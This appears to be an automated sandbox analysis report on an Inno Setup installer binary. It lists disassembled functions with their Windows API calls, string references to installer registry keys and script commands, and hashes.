Instruction Fuzzy Hash: D1F2C5786005118FCB00EB69C5D9F9A73F1BF8A304F1581A6E9049B36AD778EC46CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004132E1 Relevance: 9.6, APIs: 6, Instructions: 586COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32 ref: 0041372C
GetWindowLongA.USER32 ref: 00413737
GetWindowLongA.USER32 ref: 00413749
SetWindowLongA.USER32 ref: 0041375C
SetPropA.USER32 ref: 00413773
SetPropA.USER32 ref: 0041378A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 97bfe80bf8ee61432f76a670240df73225b07710b5e5d004723aad7e8a8e2c71
Instruction ID: 55001cc95f3aa9d9a1c45ff4a94f0120d729eeb625f187ff4b383852b5e02246
Opcode Fuzzy Hash: 97bfe80bf8ee61432f76a670240df73225b07710b5e5d004723aad7e8a8e2c71
Instruction Fuzzy Hash: B2120EA148E3C05FE7278B74896A5D07F60EE1332571941DFC5C28F1A3D61D8A8BC76A

Uniqueness

Uniqueness Score: -1.00%

Function 00474A14 Relevance: 9.1, APIs: 6, Instructions: 149fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,00474C10), ref: 00474A74
FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474ABD
FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474ACA
FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474B16
FindNextFileA.KERNEL32(000000FF,?,00000000,00474BE3,?,00000000,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474BBF
FindClose.KERNEL32(000000FF,00474BEA,00474BE3,?,00000000,?,00000000,?,?,?,?,00000000,00474C10), ref: 00474BDD

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 23f3463f48b63caa86debf7b542b8fc010e328c30f9e1a37102d144d0df4a682
Instruction ID: 6d75daa855672c9e67831e63b57356653e92e783bb5012b3bdaf98fb221fdef6
Opcode Fuzzy Hash: 23f3463f48b63caa86debf7b542b8fc010e328c30f9e1a37102d144d0df4a682
Instruction Fuzzy Hash: 16515F71900658AFCB21DF65CC45AEEB7BCEB88315F1084AAA408E7381D7389F85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0046CA68 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0046CBBA,?,?,00000001,004AE064), ref: 0046CAC1
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,0046CBBA,?,?,00000001,004AE064), ref: 0046CB86
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,0046CBBA,?,?,00000001,004AE064), ref: 0046CB94

Strings

unins???.*, xrefs: 0046CAAB
unins, xrefs: 0046CB14

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: d700b9c545a9994b5c3b730b0a7a978ab037565f1b3ba8acce1da6d75ab2e347
Instruction ID: bd5d868bda387e2be4f3073c311abf9aee2bd974f87f11138952fbe5140f0b69
Opcode Fuzzy Hash: d700b9c545a9994b5c3b730b0a7a978ab037565f1b3ba8acce1da6d75ab2e347
Instruction Fuzzy Hash: 193195705001489FDB10DF65C9D2AEEB7B8EF05714F1044F6E848E72A1EA38AF419F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B090 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040B0AA
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B207,00000000,0040B21F,?,?,?,?), ref: 0040B0BB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: 50f5a74460d3a176a6f977901a7d044a6d0dfa0e12ce65c2d3060087e560ba68
Instruction ID: 2948fd6ecb2bac01dbc7c626b87b6ef8ebd01b03295fe5e1d9ce21df9001b452
Opcode Fuzzy Hash: 50f5a74460d3a176a6f977901a7d044a6d0dfa0e12ce65c2d3060087e560ba68
Instruction Fuzzy Hash: 5D01F271704700AFEB00EF65DC62A2A77ADDB49758B10807AF500AB3C1DA79AC0196AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045157C Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004515DF,?,?,-00000001,00000000), ref: 004515B9
GetLastError.KERNEL32(00000000,?,00000000,004515DF,?,?,-00000001,00000000), ref: 004515C1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 76bad61bc4f0af6580115bd8f885e78bebf0608dca1d0fd797f93b2829e49932
Instruction ID: 2b761596f2c387da0a8c0b3962020352b440c1ec696bd3da55d5cac075a31bc0
Opcode Fuzzy Hash: 76bad61bc4f0af6580115bd8f885e78bebf0608dca1d0fd797f93b2829e49932
Instruction Fuzzy Hash: 6AF0F931A04608BB8B10DBAA9C4159EF7ACDBC5735B5047BBFC14E36A2EA3C5E04855C

Uniqueness

Uniqueness Score: -1.00%

Function 004085FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,004086C7,?,00000000,004087A6), ref: 0040861A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 50010d0bf1e67ca20538272328d5149029ebf9eac084948c6b03a7b22ed785ee
Instruction ID: 68e9f664db1ed2bf8610cb003b0dcadfc033f39245ef36fc9a098e1ad1b74175
Opcode Fuzzy Hash: 50010d0bf1e67ca20538272328d5149029ebf9eac084948c6b03a7b22ed785ee
Instruction Fuzzy Hash: 41E0D83170021827D720A9594C86DF7725C975C350F40067FB949E73C2EDB59E8186ED

Uniqueness

Uniqueness Score: -1.00%

Function 00423C4C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424219,?,00000000,00424224), ref: 00423C76

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: e1688769fd7bd0d6dab607fe8fc3e2e26ffd360abf5a591b42ec6747995d87bd
Instruction ID: ae68c2cdca38ef5850f0d921292574d88cfa71f32ebb703bed3c264f3a70824c
Opcode Fuzzy Hash: e1688769fd7bd0d6dab607fe8fc3e2e26ffd360abf5a591b42ec6747995d87bd
Instruction Fuzzy Hash: 1EF0C579205609AFDB40DF9DC588D4AFBE8FF4C260B058295B988CB321C234FD818F94

Uniqueness

Uniqueness Score: -1.00%

Function 00453D18 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?), ref: 00453D2E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: cd4705463169736317c135c968e69caf56b8538c5319c1c6acdf40a0ccdc6785
Instruction ID: 9797e56fdedcf1d2bc2f92661db947174c304adb25379886e85f9db6f22e7329
Opcode Fuzzy Hash: cd4705463169736317c135c968e69caf56b8538c5319c1c6acdf40a0ccdc6785
Instruction Fuzzy Hash: 05D0C2B120420063C700AEAA9C816D676AC8B84312F10083F7C89CA3D3EABDCB9C465B

Uniqueness

Uniqueness Score: -1.00%

Function 00467A74 Relevance: 61.6, APIs: 1, Strings: 34, Instructions: 370
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004679D0: 6CAD68C0.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,004AE064,?,00467B63,?,00000000,00467F5F,?,_is1), ref: 004679F3

RegCloseKey.ADVAPI32(?,00467F66,?,_is1,00000001,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,00467FAE,?,?,00000001,004AE064), ref: 00467F59

Strings

Inno Setup: User Info: Organization, xrefs: 00467CAF
Contact, xrefs: 00467E6F
Inno Setup: No Icons, xrefs: 00467BD3
DisplayIcon, xrefs: 00467D30
DisplayVersion, xrefs: 00467DC1
HelpLink, xrefs: 00467E18
ModifyPath, xrefs: 00467EAC
Inno Setup: Deselected Components, xrefs: 00467C45
NoRepair, xrefs: 00467ED4
" /SILENT, xrefs: 00467D97
Inno Setup: Selected Tasks, xrefs: 00467C68
NoModify, xrefs: 00467EC0
Inno Setup: Icon Group, xrefs: 00467BB5
UninstallString, xrefs: 00467D6A
InstallLocation, xrefs: 00467BA6
_is1, xrefs: 00467ABC
Inno Setup: Selected Components, xrefs: 00467C2B
URLInfoAbout, xrefs: 00467DFB
QuietUninstallString, xrefs: 00467DA4
Inno Setup: Deselected Tasks, xrefs: 00467C82
Inno Setup: User, xrefs: 00467BF2
Comments, xrefs: 00467E8C
DisplayName, xrefs: 00467D13
Publisher, xrefs: 00467DDE
Readme, xrefs: 00467E52
5.1.3-beta, xrefs: 00467B56
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 00467AB6
Inno Setup: Setup Type, xrefs: 00467C11
RegisterPreviousData, xrefs: 00467F0F
Inno Setup: App Path, xrefs: 00467B86
Inno Setup: Setup Version, xrefs: 00467B51
Inno Setup: User Info: Name, xrefs: 00467C9A
URLUpdateInfo, xrefs: 00467E35
Inno Setup: User Info: Serial, xrefs: 00467CC4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Close
String ID: " /SILENT$5.1.3-beta$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallLocation$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
API String ID: 3535843008-636458346
Opcode ID: 0eb5021d592619fd6467be79392bb931bedcf96406f7052587208b6e7538386c
Instruction ID: 3e97a354083fd7acde89d56369ffd54066c112e9c336c80bd360b87899212aab
Opcode Fuzzy Hash: 0eb5021d592619fd6467be79392bb931bedcf96406f7052587208b6e7538386c
Instruction Fuzzy Hash: B3E1A770A041099BD704EB95D892AAF77B9EB44308F20856FE41077395EF78BE05CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004856F8 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000000,00485BED,?,?,?,?,00000000,00000000,00000000), ref: 00485738
FindWindowA.USER32 ref: 00485769

Strings

LOADDLL, xrefs: 004859FB
SENDMESSAGE, xrefs: 004857BD
SENDBROADCASTMESSAGE, xrefs: 00485905
FREEDLL, xrefs: 00485AE4
OEMTOCHARBUFF, xrefs: 00485B4B
FINDWINDOWBYWINDOWNAME, xrefs: 00485781
SENDBROADCASTNOTIFYMESSAGE, xrefs: 004859A7
CREATEMUTEX, xrefs: 00485B19
REGISTERWINDOWMESSAGE, xrefs: 004858CB
CHARTOOEMBUFF, xrefs: 00485B8E
POSTMESSAGE, xrefs: 00485813
CALLDLLPROC, xrefs: 00485A5D
FINDWINDOWBYCLASSNAME, xrefs: 00485745
POSTBROADCASTMESSAGE, xrefs: 00485953
SENDNOTIFYMESSAGE, xrefs: 0048586F
SLEEP, xrefs: 00485722

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: 5e4ea56c2af6ebe0cd1ae4fb0b3339d99741b5ae9b9cfa6db2d405cfe1a2adb2
Instruction ID: a477a937e49ace85969f4353279384d416924bf77b43f5789cabccee374076e0
Opcode Fuzzy Hash: 5e4ea56c2af6ebe0cd1ae4fb0b3339d99741b5ae9b9cfa6db2d405cfe1a2adb2
Instruction Fuzzy Hash: B9C140A0B086015BDB14BF7E8C8691F55999F88704720D93FB446EB78BCE3CED0A4359

Uniqueness

Uniqueness Score: -1.00%

Function 00478258 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00478269
6CAD5550.KERNEL32(00000000,GetNativeSystemInfo,kernel32.dll), ref: 00478276
GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00478284
6CAD5550.KERNEL32(00000000,IsWow64Process), ref: 0047828C
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00478298
6CAD5550.KERNEL32(00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004782B9
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004782CC
6CAD5550.KERNEL32(00000000,advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004782D2
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004782E9

Strings

GetNativeSystemInfo, xrefs: 00478270
GetSystemWow64DirectoryA, xrefs: 004782B3
IsWow64Process, xrefs: 00478286
RegDeleteKeyExA, xrefs: 004782C2
advapi32.dll, xrefs: 004782C7
kernel32.dll, xrefs: 00478264

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550$HandleInfoModuleSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 3480996200-2623177817
Opcode ID: 7b47165dbd981a408bc2786a271a0a7f06fd2e08640aa44ab4db1ba7637f98b1
Instruction ID: 46d5fe1d6d5815e07bab5a4b40e1e10a51b1c8387462ed9a08c7b8fdd4530e95
Opcode Fuzzy Hash: 7b47165dbd981a408bc2786a271a0a7f06fd2e08640aa44ab4db1ba7637f98b1
Instruction Fuzzy Hash: 5611D334284F41A5D61063BA5D9EBEF17488B01B59F18896F7C48A52D3DD7EC8408B7F

Uniqueness

Uniqueness Score: -1.00%

Function 00462BE8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegCloseKey.ADVAPI32(?,00462E02,?,?,00000001,00000000,00000000,00462E1D,?,00000000,00000000,?), ref: 00462DEB

Strings

Inno Setup: Deselected Tasks, xrefs: 00462D79
Inno Setup: No Icons, xrefs: 00462CD3
Inno Setup: Setup Type, xrefs: 00462CFA
Inno Setup: User Info: Serial, xrefs: 00462DCD
%s\%s_is1, xrefs: 00462C65
Inno Setup: Selected Tasks, xrefs: 00462D57
Inno Setup: User Info: Organization, xrefs: 00462DBA
Inno Setup: Icon Group, xrefs: 00462CC6
Inno Setup: App Path, xrefs: 00462CAA
Inno Setup: Deselected Components, xrefs: 00462D2C
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00462C47
Inno Setup: Selected Components, xrefs: 00462D0A
Inno Setup: User Info: Name, xrefs: 00462DA7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790
String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 3513276378-1093091907
Opcode ID: 17edf25954bddf7f48825c5b40fd28439f017680b5dc4ad28f048a29b95886a0
Instruction ID: 14966b6133968fffe3011c3084ea855d64415c2e69430a5297c16372ad3f805f
Opcode Fuzzy Hash: 17edf25954bddf7f48825c5b40fd28439f017680b5dc4ad28f048a29b95886a0
Instruction Fuzzy Hash: 9F51C730A00A14ABCB15DB65DA51BDEBBF4EF48304F90847BE850A7391E778AE05CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0046B48C Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 554
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CAD6690.ADVAPI32(?,00000000,?,00000002,00000000,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?,00000001), ref: 0046B614
RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?), ref: 0046B61D
6CAD6690.ADVAPI32(?,00000000,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?), ref: 0046B73B

Part of subcall function 0042DC7C: 6CAD64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DCA8

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?), ref: 0046B810
6CAD68C0.ADVAPI32(?,00000000,00000000,00000002,00000000,00000001,?,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?), ref: 0046B904
6CAD68C0.ADVAPI32(?,00000000,00000000,00000004,?,00000004,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?), ref: 0046B966
6CAD68C0.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?), ref: 0046B9B6
RegCloseKey.ADVAPI32(?,0046B9F9,?,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?,00000001,004AE064), ref: 0046B9EC

Strings

Cannot access 64-bit registry keys on this version of Windows, xrefs: 0046B56A
olddata, xrefs: 0046B82C, 0046B88B
break, xrefs: 0046B899
dJ, xrefs: 0046B8A1, 0046B8D7
{olddata}, xrefs: 0046B7C1, 0046B858

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6690$QueryValue
String ID: Cannot access 64-bit registry keys on this version of Windows$break$dJ$olddata${olddata}
API String ID: 1650330858-3083077437
Opcode ID: 65f3144aefbda9cece841e54d27e662fc1e0a683af48279e37bbe27d79f3963f
Instruction ID: 471098541b2f653e8403ac396bc0f68c9be0cc512637e3bdc5dd47f0662afdfc
Opcode Fuzzy Hash: 65f3144aefbda9cece841e54d27e662fc1e0a683af48279e37bbe27d79f3963f
Instruction Fuzzy Hash: C0221D74A01248AFDB10EF99D985B9EB7F9EF08304F504066F904EB362D738AD45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042393C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041F48C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EE6C,?,00423957,00423CD4,0041EE6C), ref: 0041F4AA

GetClassInfoA.USER32 ref: 00423967
RegisterClassA.USER32 ref: 0042397F
GetSystemMetrics.USER32 ref: 004239A1
GetSystemMetrics.USER32 ref: 004239B0
SetWindowLongA.USER32 ref: 00423A0C
SendMessageA.USER32(00410718,00000080,00000001,00000000), ref: 00423A2D
GetSystemMenu.USER32(00410718,00000000,00410718,000000FC,00423754,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00400000), ref: 00423A38
